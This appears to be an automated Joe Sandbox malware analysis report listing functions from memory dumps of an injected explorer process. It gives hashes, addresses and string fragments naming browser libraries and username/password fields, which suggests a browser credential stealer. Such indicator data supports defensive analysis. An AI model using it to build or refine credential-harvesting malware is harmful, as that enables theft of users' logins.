Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 07C19174618A194FC758EF68D496AAAB3E1FBA8304F81432DA44ECB251DF34F942C785

Function 104182F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

l, xrefs: 104184E2
nspr, xrefs: 104184D4
cli., xrefs: 10418327
dll, xrefs: 1041832E
4.dl, xrefs: 104184DB
opera_browser.dll, xrefs: 10418629
dragon_s.dll, xrefs: 10418614
sspi, xrefs: 10418320

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: bf925cf0c5dc2ca3186700e287a977554a4d8a8fd32f3b27ac0637370ffb03cd
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: B7C1A374618A194FC758EF68D496AAAB3E1FBA8304F81432DA44ECB251DF34F942C7C5

Function 0E8762F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0E876629
sspi, xrefs: 0E876320
dll, xrefs: 0E87632E
l, xrefs: 0E8764E2
4.dl, xrefs: 0E8764DB
dragon_s.dll, xrefs: 0E876614
cli., xrefs: 0E876327
nspr, xrefs: 0E8764D4

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 1a57746c9d5fdd26e7f7329953a9225ae3f454f5e7654223739a2c04ffcac0f0
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 43C19E70618E198FC758EF68D495AAAB3E1FF98300F54476D848AC7255EF30EE41C786

Function 0E8762F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0E876629
sspi, xrefs: 0E876320
dll, xrefs: 0E87632E
l, xrefs: 0E8764E2
4.dl, xrefs: 0E8764DB
dragon_s.dll, xrefs: 0E876614
cli., xrefs: 0E876327
nspr, xrefs: 0E8764D4

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 6fdf0fd6857f5d17af04718c4661cbbd04c16ae7c26b478a194da2714af88b96
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 7CC18D70618E198FC758EF68D495AAAB3E1FF98300F54476D848AC7255EF30EE418B86

Function 0E5A92F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 0E5A9614
l, xrefs: 0E5A94E2
nspr, xrefs: 0E5A94D4
4.dl, xrefs: 0E5A94DB
opera_browser.dll, xrefs: 0E5A9629
dll, xrefs: 0E5A932E
cli., xrefs: 0E5A9327
sspi, xrefs: 0E5A9320

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 3b8aac2aab230ee8ba40a0ea25d5737670f1006b5799c1ee2369a38744903570
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: E8C17E70618A1A8FC758EF68D495AEAF3E1FFD8300F944B2D960EC7255DF30A9058B85

Function 0E5A92F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 0E5A9614
l, xrefs: 0E5A94E2
nspr, xrefs: 0E5A94D4
4.dl, xrefs: 0E5A94DB
opera_browser.dll, xrefs: 0E5A9629
dll, xrefs: 0E5A932E
cli., xrefs: 0E5A9327
sspi, xrefs: 0E5A9320

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 18cad39d71da5f95f9440e29c33c4d47d5c4b3ff20f000bc76d97c5d101e04a2
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: DBC18F70618A1A8FC758EF68D495AEAF3E1FFD8300F944B2D960EC7255DF30A9058B85

Function 0E74DCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 0E74DD97
word, xrefs: 0E74DD9E
L: , xrefs: 0E74DD66
name, xrefs: 0E74DDB2
UR, xrefs: 0E74DD5F
User, xrefs: 0E74DDAB
2, xrefs: 0E74DDE1

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 3531f8e4f8929ef0dfc15f3deeba13eae0814bbea0c7159d4f55d1d5452c5f0e
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: B9A1A1716187488FDB29EFA8D4447EEB7E1FF84304F404A2DE48AD7261EF7099458B85

Function 0BE39CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

name, xrefs: 0BE39DB2
2, xrefs: 0BE39DE1
Pass, xrefs: 0BE39D97
User, xrefs: 0BE39DAB
word, xrefs: 0BE39D9E
UR, xrefs: 0BE39D5F
L: , xrefs: 0BE39D66

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 0a9a7f1c33c1a728bd9d73105950116a20b9814c0831efaa13e4b2120a9ec127
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: A4A1CF30A187488FDB18EFA8D4457EEB7E1FF88300F40562DD48AD7241EB708595C78A

Function 10419CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 10419D97
word, xrefs: 10419D9E
name, xrefs: 10419DB2
UR, xrefs: 10419D5F
User, xrefs: 10419DAB
2, xrefs: 10419DE1
L: , xrefs: 10419D66

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: a3b8d30c51e833e1ca254e72f45f6b05e4e78d7b2bdfb3824b61e3ce5fd7e9d3
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 44A1D2746187488FDB18DF68E4847EEB7E1FF98304F40462DE48AD7251EF34A9858789

Function 0E877CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 0E877D97
UR, xrefs: 0E877D5F
L: , xrefs: 0E877D66
word, xrefs: 0E877D9E
name, xrefs: 0E877DB2
User, xrefs: 0E877DAB
2, xrefs: 0E877DE1

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 2bca043c884fb2821c146de95ff3f54f2530aa5713ca86478193d22504f97122
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: F3A17F706187488BDB19EFA8D444BEEB7E1FF98300F40462EE48AD7291EB749945C786

Function 0E5AACD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

name, xrefs: 0E5AADB2
word, xrefs: 0E5AAD9E
UR, xrefs: 0E5AAD5F
L: , xrefs: 0E5AAD66
Pass, xrefs: 0E5AAD97
2, xrefs: 0E5AADE1
User, xrefs: 0E5AADAB

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 079a4af150f3db03af6a8fd52b7bf95ca86988fb38c308a6cc52a939c6b2e958
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: D9A180706187488FDB29EFA894447EEB7E1FF98300F404A2ED58AD7252EF709945C785

Function 0E74DCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 0E74DD97
word, xrefs: 0E74DD9E
L: , xrefs: 0E74DD66
name, xrefs: 0E74DDB2
UR, xrefs: 0E74DD5F
User, xrefs: 0E74DDAB
2, xrefs: 0E74DDE1

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: c3359a04c8d9b5b78f992f581cf07f6cda366f734eb8d3cd32851516032e5217
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: C991A1716187488FDB29EFA8D4447EEB7E1FF88304F40462DE48AD7261EF7099458B85

Function 0BE39CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

name, xrefs: 0BE39DB2
2, xrefs: 0BE39DE1
Pass, xrefs: 0BE39D97
User, xrefs: 0BE39DAB
word, xrefs: 0BE39D9E
UR, xrefs: 0BE39D5F
L: , xrefs: 0BE39D66

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 9b4d9964919b4cf0757950375eb123ac2fb82b916d157c0471fe36c6acc9dd4a
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: B791BF70A187488FDB18EFA8D445BEEB7E1FF88704F00562DE48AD7241EB708595CB86

Function 10419CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 10419D97
word, xrefs: 10419D9E
name, xrefs: 10419DB2
UR, xrefs: 10419D5F
User, xrefs: 10419DAB
2, xrefs: 10419DE1
L: , xrefs: 10419D66

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 3f9cf9cfe9408b2d7030e5810588cca1b1222e365f359c22eb893aa542893eb0
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: C091D1746187488FDB18DFA8E4847EEB7E1FF98304F40462EE48AD7251EF3499858789

Function 0E877CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 0E877D97
UR, xrefs: 0E877D5F
L: , xrefs: 0E877D66
word, xrefs: 0E877D9E
name, xrefs: 0E877DB2
User, xrefs: 0E877DAB
2, xrefs: 0E877DE1

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 1d8ba95d6719fc99983e5a7721ddc073462cde6313b14f4c877cd0edf596fd49
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: C1917E706187488BDB19EFA8D444BEEB7E1FF98300F40462EE48AD7291EB709945C786

Function 0E5AACE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

name, xrefs: 0E5AADB2
word, xrefs: 0E5AAD9E
UR, xrefs: 0E5AAD5F
L: , xrefs: 0E5AAD66
Pass, xrefs: 0E5AAD97
2, xrefs: 0E5AADE1
User, xrefs: 0E5AADAB

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: c75e1e7511c28a1e50a9064f86924666a233d10f0f0fc28b11728b4eb1ee2d75
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 5091707061874C8FDB29EFA8D4447EEB7E1FB98300F404A2ED54AD7251EB709945C785

Function 0E74D352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

e, xrefs: 0E74D48E
., xrefs: 0E74D3B0
n, xrefs: 0E74D3E7
, xrefs: 0E74D47C
v, xrefs: 0E74D4A0

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: b4a3d21c9c4348bddeb948232fa2385a5281775bb3a25a756a995778c1f24fa8
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 0D719471618B498FD758EFA8C4887AAB7F1FF94304F00062ED99AC7221EF71D9458B85

Function 0BE39352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

e, xrefs: 0BE3948E
., xrefs: 0BE393B0
, xrefs: 0BE3947C
v, xrefs: 0BE394A0
n, xrefs: 0BE393E7

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 3a328e4be80f16330d9c1d1eb6081b0263dbae9fcfc7a3d8eae75743ea310bf7
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: C7719131618B488FD758EFA8D4897AAB7F1FF98304F00162ED44AD7261EB71E945CB81

Function 10419352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 104193B0
v, xrefs: 104194A0
n, xrefs: 104193E7
, xrefs: 1041947C
e, xrefs: 1041948E

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: e2262521fb31d70d6b00b9996bacea2221077da301a7f83af6eef2d6aa01d47d
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: F371A035618B488FD758DFA8D4857AAB7F1FF98304F00062EE44AC7261EF75E9468B81

Function 0E877352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 0E87747C
e, xrefs: 0E87748E
., xrefs: 0E8773B0
v, xrefs: 0E8774A0
n, xrefs: 0E8773E7

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: b5a101543313be7950cdbbdf1b1394955fc0a8508be9ce1ee243fb0258052e12
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 1E7162316187498FD759EFA8C4846AAB7F1FF58305F00062FD48AC7261EB71D945CB86

Function 0E5AA352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 0E5AA3B0
v, xrefs: 0E5AA4A0
, xrefs: 0E5AA47C
e, xrefs: 0E5AA48E
n, xrefs: 0E5AA3E7

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 8abf22e33d72d4e6186842be031de707d069048c708f16b84df3606c46a7a34c
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: DD714131618B498FD759EFA8C4846EAB7F1FF98304F000A2ED54AC7261EB71E945CB85

Function 0E748C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0E748C64
ole3, xrefs: 0E748C5D
l32., xrefs: 0E748C97
shel, xrefs: 0E748C90
dll, xrefs: 0E748C9E

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 445c79c492e42c22f8dd4da8e9117f32f60e6b579bbb31ff75057ae902e1a864
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 57514FB1918B4C8FDB54EFA4C045AEEB7F1FF58300F404A2E999AE7214EF7095418B89

Function 0BE34C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 0BE34C9E
ole3, xrefs: 0BE34C5D
2.dl, xrefs: 0BE34C64
l32., xrefs: 0BE34C97
shel, xrefs: 0BE34C90

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 2615295db7f4f946ee3dcd82b38ebe759f4a6392e1f76d683026b110b017ab56
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 65514BB0918B4C8FDB54EFA4C045AEAB7F1FF58300F40562E959AE7214EF309545CB89

Function 10414C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 10414C9E
ole3, xrefs: 10414C5D
l32., xrefs: 10414C97
2.dl, xrefs: 10414C64
shel, xrefs: 10414C90

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 3c25138472dfbcb59489fa7aea9840976bbbd907816ddd80f8f8f14f33aa5c6a
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 5F514DB0914B4C8BDB54EFA4D0857EEB7F1FF68304F40462EA49AE7214EF34A5418B89

Function 0E872C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 0E872C9E
ole3, xrefs: 0E872C5D
2.dl, xrefs: 0E872C64
shel, xrefs: 0E872C90
l32., xrefs: 0E872C97

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 95da96d566a6e0221d58338223d570c3c91109f90a1f55268fd9db514e129593
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: AD514EB0918B4C8FDB55EFA8C0446EEB7F1FF58300F404A2E959AE7254EF3095418B8A

Function 0E5A5C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0E5A5C64
l32., xrefs: 0E5A5C97
ole3, xrefs: 0E5A5C5D
dll, xrefs: 0E5A5C9E
shel, xrefs: 0E5A5C90

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: fc37ca93b298c5f117cb68e2156a52b7113ed1e20c5e9be0e84d810f0f7847bd
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 44515EB0918B4D8FDB64EFA4C045AEEB7F1FF58300F404A2E959AE7254EF3095418B89

Function 0E74986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

4, xrefs: 0E7499E9
dll, xrefs: 0E7498F4
vers, xrefs: 0E7498E4
\, xrefs: 0E7499E0
ion., xrefs: 0E7498EC

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 84dd309cdf22b8496e19e27026b45d254032c2ac4431aa221d85203aff6ac0c3
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 5941A231218B498BCB74EF2888457EBB3E4FB98301F40462E999EC7210EF70D945CB82

Function 0BE3586F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

ion., xrefs: 0BE358EC
vers, xrefs: 0BE358E4
dll, xrefs: 0BE358F4
4, xrefs: 0BE359E9
\, xrefs: 0BE359E0

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 0d40396826e0645dbb6be7b2663d521ede1421b7eaa8f028d9dc2c08288a8a18
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 0B419130628B898FCB75EF2498457EA73E4FBA8705F40562E984EC7240EF30D645C782

Function 1041586F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

ion., xrefs: 104158EC
4, xrefs: 104159E9
vers, xrefs: 104158E4
dll, xrefs: 104158F4
\, xrefs: 104159E0

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

